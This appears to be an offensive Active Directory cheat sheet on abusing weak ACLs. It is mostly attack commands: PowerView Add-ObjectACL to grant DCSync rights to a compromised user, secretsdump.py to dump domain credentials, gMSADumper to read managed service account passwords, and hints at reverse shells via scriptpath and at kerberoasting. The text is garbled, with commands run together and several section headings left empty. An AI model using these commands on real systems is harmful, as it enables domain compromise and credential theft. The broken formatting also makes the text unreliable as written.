Abuse Weak Access Control Lists (ACLs)
Write DACL
$SecPassword = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUser,$SecPasswordAdd-ObjectACL -PrincipalIdentity compromiseduser -Credential $cred -Rights DCSyncFrom the attacking box
secretsdumps.py $domain/user@$ipGetChangesAll (DCSync)
From the attacking box
secretsdump.py domain/user@ipOr use Mimikatz
ReadGMSApassword
Remotely
You may need to use ntpdate $domain if you get clockscrew error
python2 /opt/gMSADumper/gMSADumper.py -d $domain -u CompromisedUser -p PasswordLocally
ForceChangePassword
GenericAll
GenericWrite
Use this for reverseshell using scriptpath=, enumeration, or use serviceprincipalname= for kerberoast
OR
WriteOwner
Automation
Find ACLs of interest whether it be the current compromised user, or users found. start with current user.
Last updated